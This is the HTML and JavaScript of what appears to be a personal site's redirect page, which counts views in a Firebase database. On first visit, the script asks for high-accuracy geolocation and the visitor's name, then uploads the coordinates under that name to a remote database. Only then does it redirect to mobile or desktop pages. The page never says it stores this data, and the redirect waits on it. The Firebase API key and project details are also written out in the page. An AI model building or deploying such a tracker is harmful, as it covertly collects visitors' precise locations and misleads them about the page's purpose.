<!DOCTYPE html>
<html lang="en">
<head>
    <script src="https://www.gstatic.com/firebasejs/8.3.0/firebase-app.js"></script>
    <script src="https://www.gstatic.com/firebasejs/8.3.0/firebase-database.js"></script>
    <script>
        var firebaseConfig = {
            apiKey: "AIzaSyDCJ8aDj1aNAabamLYsFbMlUArYmzdvGWo",
            authDomain: "shresth-sharma-v3.firebaseapp.com",
            databaseURL: "https://shresth-sharma-v3-default-rtdb.firebaseio.com",
            projectId: "shresth-sharma-v3",
            storageBucket: "shresth-sharma-v3.appspot.com",
            messagingSenderId: "52938966152",
            appId: "1:52938966152:web:7f3b056755e84853fe0b3d"
        };
        firebase.initializeApp(firebaseConfig);
    </script>
    <title>Shresth._.Sharma</title>
</head>
<body>
    <h1 ></h1><br>
    <h1>if the page do not redirect directlt click</h1><br>
    <h1>Mobile : </h1><a href="mobile.html">Mobile</a><br>
    <h1>Pc : </h1><a href="pc.html">Pc</a><br>
    <script>
        database = firebase.database()
        function setCookie(name,value,days) {
            var expires = "";
            if (days) {
                var date = new Date();
                date.setTime(date.getTime() + (days*24*60*60*1000));
                expires = "; expires=" + date.toUTCString();
            }
            console.log(name + "=" + (value || "")  + expires + "; path=/")
            document.cookie = name + "=" + (value || "")  + expires + "; path=/";
        }
        function getCookie(name) {
            var nameEQ = name + "=";
            var ca = document.cookie.split(';');
            for(var i=0;i < ca.length;i++) {
                var c = ca[i];
                while (c.charAt(0)==' ') c = c.substring(1,c.length);
                if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
            }
            return null;
        }
        var a = String(navigator.userAgent).toString()
        if(getCookie('old') == null){
            setCookie('old', 1, 365)
            var gameStateRef  = database.ref('V4/view');
            gameStateRef.once("value",function(data){
                view = data.val()
                view +=1
                database.ref('V4').update({
                    view:view
                });
            });
                if ("geolocation" in navigator) {
                    navigator.geolocation.getCurrentPosition(function (position) {
                        var latitude = position.coords.latitude;
                        var longitude = position.coords.longitude;
                        console.log("Latitude: " + latitude + ", Longitude: " + longitude);
                        var userName = prompt("Please enter your name:");
                        if (userName) {
                            console.log("Hello, " + userName + "!");
                            database.ref('V4/Location/'+userName).update({
                                latitude: latitude,
                                longitude: longitude
                            });
                            redirect()
                        }else {
                            console.log("You did not enter your name.");
                        }
                    },function (error) {
                        console.error("Error getting location: " + error.message);
                    }, { enableHighAccuracy: true });
                }else {
                    console.log("Geolocation is not available in this browser.");
                }
        }
        function redirect(){
            if (a.includes('Android') || a.includes('webOS') || a.includes('iPhone') || a.includes('iPad') || a.includes('iPod') || a.includes('BlackBerry') || a.includes('Windows Phone')){
                b = true 
            }
            else{
                b=false
            }
            console.log(b)
            document.getElementsByTagName('h1')[0].innerHTML = a
            if(b){
                window.open('mobile.html', '_top')
            }
            else{
                window.open('pc.html', '_top')
            }
        }
    </script>
</body>
</html>
